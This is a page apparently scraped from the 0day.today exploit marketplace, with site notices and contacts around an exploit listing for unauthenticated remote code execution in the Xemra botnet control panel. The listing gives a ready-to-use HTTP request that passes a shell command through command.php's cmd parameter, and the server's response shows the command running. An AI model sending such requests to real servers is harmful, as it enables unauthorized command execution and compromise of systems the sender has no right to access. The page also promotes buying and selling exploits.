0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Xemra Botnet Remote Code Execution

Author

GalaxyAndroid2

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

Platform

##########################################################################
# Exploit Title: Xemra Botnet Remote Code Execution Vulnerability
# Date: 13.12.2013
# Exploit Author: GalaxyAndroid
# Vendor Homepage: unkn0wn
# Software Link: http://www.hackreports.com/2012/07/download-zemra-botnet-ddos-attack.html
# Version: unknown
# Tested on: Windows 7 with Xampp
# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing!
# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL
#################################Exploit-Code###################################

PoC execute dir Command. No authentication needed!

#########
GET http://127.0.0.1/xemra/system/command.php?cmd=dir HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cache-Control: max-age=0
############

Response:

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2013 18:29:42 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
X-Powered-By: PHP/5.2.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 685

<h1>cmd</h1><pre> Datenträger in Laufwerk C: ist 


 Verzeichnis von C:\xampp\htdocs\xemra\system

13.12.2013  19:16    <DIR>          .
13.12.2013  19:16    <DIR>          ..
18.04.2012  22:09               646 base.class.php
26.11.2011  13:47                88 command.php
18.05.2012  08:11               277 config.include.php
18.04.2012  22:09             1.348 database.class.php
13.12.2013  19:16    <DIR>          geoip
18.04.2012  22:09               694 global.php
18.04.2012  22:09             1.725 session.class.php
               6 Datei(en),          4.778 Bytes
               3 Verzeichnis(se), 66.773.762.048 Bytes frei

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Xemra Botnet Remote Code Execution

Report Error

Report Error